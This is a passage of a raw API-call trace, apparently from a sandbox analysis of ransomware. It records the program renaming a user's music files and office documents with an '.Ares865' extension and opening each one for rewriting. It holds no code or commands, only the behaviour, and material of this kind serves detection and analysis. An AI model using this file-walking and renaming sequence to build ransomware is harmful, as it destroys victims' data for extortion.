lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq" [0094.450] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\6jCQLV.mp3.Ares865") returned 85 [0094.450] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\6jCQLV.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\a5xhfganq\\6jcqlv.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\6jCQLV.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\a5xhfganq\\6jcqlv.mp3.ares865"), dwFlags=0x1) returned 1 [0094.451] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\6jCQLV.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\a5xhfganq\\6jcqlv.mp3.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.452] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=90541) returned 1 [0094.457] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\cR8- 0gZ.wav.Ares865") returned 87 [0094.457] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\cR8- 0gZ.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\a5xhfganq\\cr8- 0gz.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\cR8- 0gZ.wav.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\a5xhfganq\\cr8- 0gz.wav.ares865"), dwFlags=0x1) returned 1 [0094.457] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\cR8- 0gZ.wav.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\a5xhfganq\\cr8- 0gz.wav.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.458] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=29331) returned 1 [0094.460] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\J9P--xPjIBfOh.mp3.Ares865") returned 92 [0094.461] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\J9P--xPjIBfOh.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\a5xhfganq\\j9p--xpjibfoh.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\J9P--xPjIBfOh.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\a5xhfganq\\j9p--xpjibfoh.mp3.ares865"), dwFlags=0x1) returned 1 [0094.461] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\J9P--xPjIBfOh.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\a5xhfganq\\j9p--xpjibfoh.mp3.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.462] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8302) returned 1 [0094.464] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\wzXQMO.mp3.Ares865") returned 85 [0094.464] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\wzXQMO.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\a5xhfganq\\wzxqmo.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\wzXQMO.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\a5xhfganq\\wzxqmo.mp3.ares865"), dwFlags=0x1) returned 1 [0094.465] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\wzXQMO.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\a5xhfganq\\wzxqmo.mp3.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.465] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=23344) returned 1 [0094.467] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\x1eZvkqpE8AlMdW.m4a.Ares865") returned 94 [0094.467] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\x1eZvkqpE8AlMdW.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\a5xhfganq\\x1ezvkqpe8almdw.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\x1eZvkqpE8AlMdW.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\a5xhfganq\\x1ezvkqpe8almdw.m4a.ares865"), dwFlags=0x1) returned 1 [0094.468] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\x1eZvkqpE8AlMdW.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\a5xhfganq\\x1ezvkqpe8almdw.m4a.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.468] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=87435) returned 1 [0094.473] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\YIrGFC4c.wav.Ares865") returned 87 [0094.473] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\YIrGFC4c.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\a5xhfganq\\yirgfc4c.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\YIrGFC4c.wav.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\a5xhfganq\\yirgfc4c.wav.ares865"), dwFlags=0x1) returned 1 [0094.474] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\YIrGFC4c.wav.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\a5xhfganq\\yirgfc4c.wav.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.474] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=24991) returned 1 [0094.477] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\SYJm5ty_9Yg3ouLbVrXO", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\SYJm5ty_9Yg3ouLbVrXO") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\SYJm5ty_9Yg3ouLbVrXO" [0094.478] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\SYJm5ty_9Yg3ouLbVrXO\\J0SN.m4a.Ares865") returned 104 [0094.478] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\SYJm5ty_9Yg3ouLbVrXO\\J0SN.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\a5xhfganq\\syjm5ty_9yg3oulbvrxo\\j0sn.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\SYJm5ty_9Yg3ouLbVrXO\\J0SN.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\a5xhfganq\\syjm5ty_9yg3oulbvrxo\\j0sn.m4a.ares865"), dwFlags=0x1) returned 1 [0094.478] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\SYJm5ty_9Yg3ouLbVrXO\\J0SN.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\a5xhfganq\\syjm5ty_9yg3oulbvrxo\\j0sn.m4a.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.479] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=26468) returned 1 [0094.481] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\SYJm5ty_9Yg3ouLbVrXO\\urVp_o7qRKTOM31.wav.Ares865") returned 115 [0094.481] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\SYJm5ty_9Yg3ouLbVrXO\\urVp_o7qRKTOM31.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\a5xhfganq\\syjm5ty_9yg3oulbvrxo\\urvp_o7qrktom31.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\SYJm5ty_9Yg3ouLbVrXO\\urVp_o7qRKTOM31.wav.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\a5xhfganq\\syjm5ty_9yg3oulbvrxo\\urvp_o7qrktom31.wav.ares865"), dwFlags=0x1) returned 1 [0094.482] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\SYJm5ty_9Yg3ouLbVrXO\\urVp_o7qRKTOM31.wav.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\a5xhfganq\\syjm5ty_9yg3oulbvrxo\\urvp_o7qrktom31.wav.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.482] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28919) returned 1 [0094.486] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\SYJm5ty_9Yg3ouLbVrXO\\yQ7ofc.wav.Ares865") returned 106 [0094.486] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\SYJm5ty_9Yg3ouLbVrXO\\yQ7ofc.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\a5xhfganq\\syjm5ty_9yg3oulbvrxo\\yq7ofc.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\SYJm5ty_9Yg3ouLbVrXO\\yQ7ofc.wav.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\a5xhfganq\\syjm5ty_9yg3oulbvrxo\\yq7ofc.wav.ares865"), dwFlags=0x1) returned 1 [0094.486] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\a5xHFgAnq\\SYJm5ty_9Yg3ouLbVrXO\\yQ7ofc.wav.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\a5xhfganq\\syjm5ty_9yg3oulbvrxo\\yq7ofc.wav.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.487] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=52724) returned 1 [0094.491] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\HC2DWD8y9GCS-C", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\HC2DWD8y9GCS-C") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\HC2DWD8y9GCS-C" [0094.491] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\AAhmMGDil", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\AAhmMGDil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\AAhmMGDil" [0094.491] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\AAhmMGDil\\9WRDzpBM.pdf.Ares865") returned 73 [0094.491] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\AAhmMGDil\\9WRDzpBM.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\aahmmgdil\\9wrdzpbm.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\AAhmMGDil\\9WRDzpBM.pdf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\aahmmgdil\\9wrdzpbm.pdf.ares865"), dwFlags=0x1) returned 1 [0094.492] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\AAhmMGDil\\9WRDzpBM.pdf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\aahmmgdil\\9wrdzpbm.pdf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.492] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=62554) returned 1 [0094.496] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\AAhmMGDil\\AunB46i.ots.Ares865") returned 72 [0094.496] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\AAhmMGDil\\AunB46i.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\aahmmgdil\\aunb46i.ots"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\AAhmMGDil\\AunB46i.ots.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\aahmmgdil\\aunb46i.ots.ares865"), dwFlags=0x1) returned 1 [0094.497] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\AAhmMGDil\\AunB46i.ots.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\aahmmgdil\\aunb46i.ots.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.497] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=56645) returned 1 [0094.502] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\AAhmMGDil\\FIJvnN01Tnc96Wbx-V.xlsx.Ares865") returned 84 [0094.502] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\AAhmMGDil\\FIJvnN01Tnc96Wbx-V.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\aahmmgdil\\fijvnn01tnc96wbx-v.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\AAhmMGDil\\FIJvnN01Tnc96Wbx-V.xlsx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\aahmmgdil\\fijvnn01tnc96wbx-v.xlsx.ares865"), dwFlags=0x1) returned 1 [0094.503] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\AAhmMGDil\\FIJvnN01Tnc96Wbx-V.xlsx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\aahmmgdil\\fijvnn01tnc96wbx-v.xlsx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.503] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=79188) returned 1 [0094.510] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\AAhmMGDil\\S66RdXEYILoQusWLL.pptx.Ares865") returned 83 [0094.510] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\AAhmMGDil\\S66RdXEYILoQusWLL.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\aahmmgdil\\s66rdxeyiloquswll.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\AAhmMGDil\\S66RdXEYILoQusWLL.pptx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\aahmmgdil\\s66rdxeyiloquswll.pptx.ares865"), dwFlags=0x1) returned 1 [0094.510] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\AAhmMGDil\\S66RdXEYILoQusWLL.pptx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\aahmmgdil\\s66rdxeyiloquswll.pptx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.511] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=61103) returned 1 [0094.515] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\AAhmMGDil\\T8vx.csv.Ares865") returned 69 [0094.515] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\AAhmMGDil\\T8vx.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\aahmmgdil\\t8vx.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\AAhmMGDil\\T8vx.csv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\aahmmgdil\\t8vx.csv.ares865"), dwFlags=0x1) returned 1 [0094.516] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\AAhmMGDil\\T8vx.csv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\aahmmgdil\\t8vx.csv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.516] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=18941) returned 1 [0094.518] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\AAhmMGDil\\Tpue5B2Zg9wl.pptx.Ares865") returned 78 [0094.519] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\AAhmMGDil\\Tpue5B2Zg9wl.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\aahmmgdil\\tpue5b2zg9wl.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\AAhmMGDil\\Tpue5B2Zg9wl.pptx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\aahmmgdil\\tpue5b2zg9wl.pptx.ares865"), dwFlags=0x1) returned 1 [0094.519] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\AAhmMGDil\\Tpue5B2Zg9wl.pptx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\aahmmgdil\\tpue5b2zg9wl.pptx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.520] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=101200) returned 1 [0094.525] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\AAhmMGDil\\Uh-p4OWxt2bQ4b48QJIt.ots.Ares865") returned 85 [0094.525] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\AAhmMGDil\\Uh-p4OWxt2bQ4b48QJIt.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\aahmmgdil\\uh-p4owxt2bq4b48qjit.ots"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\AAhmMGDil\\Uh-p4OWxt2bQ4b48QJIt.ots.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\aahmmgdil\\uh-p4owxt2bq4b48qjit.ots.ares865"), dwFlags=0x1) returned 1 [0094.526] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\AAhmMGDil\\Uh-p4OWxt2bQ4b48QJIt.ots.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\aahmmgdil\\uh-p4owxt2bq4b48qjit.ots.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.526] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15543) returned 1 [0094.529] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\6vEJXxv", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\6vEJXxv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\6vEJXxv" [0094.529] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\6vEJXxv\\tXP_OoQPU-g4.pdf.Ares865") returned 75 [0094.529] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\6vEJXxv\\tXP_OoQPU-g4.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\6vejxxv\\txp_ooqpu-g4.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\6vEJXxv\\tXP_OoQPU-g4.pdf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\6vejxxv\\txp_ooqpu-g4.pdf.ares865"), dwFlags=0x1) returned 1 [0094.530] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\6vEJXxv\\tXP_OoQPU-g4.pdf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\6vejxxv\\txp_ooqpu-g4.pdf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.530] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=100465) returned 1 [0094.535] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\6vEJXxv\\vysylnVpAM6gDDg.ots.Ares865") returned 78 [0094.535] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\6vEJXxv\\vysylnVpAM6gDDg.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\6vejxxv\\vysylnvpam6gddg.ots"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\6vEJXxv\\vysylnVpAM6gDDg.ots.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\6vejxxv\\vysylnvpam6gddg.ots.ares865"), dwFlags=0x1) returned 1 [0094.536] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\6vEJXxv\\vysylnVpAM6gDDg.ots.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\6vejxxv\\vysylnvpam6gddg.ots.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.536] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=36575) returned 1 [0094.540] 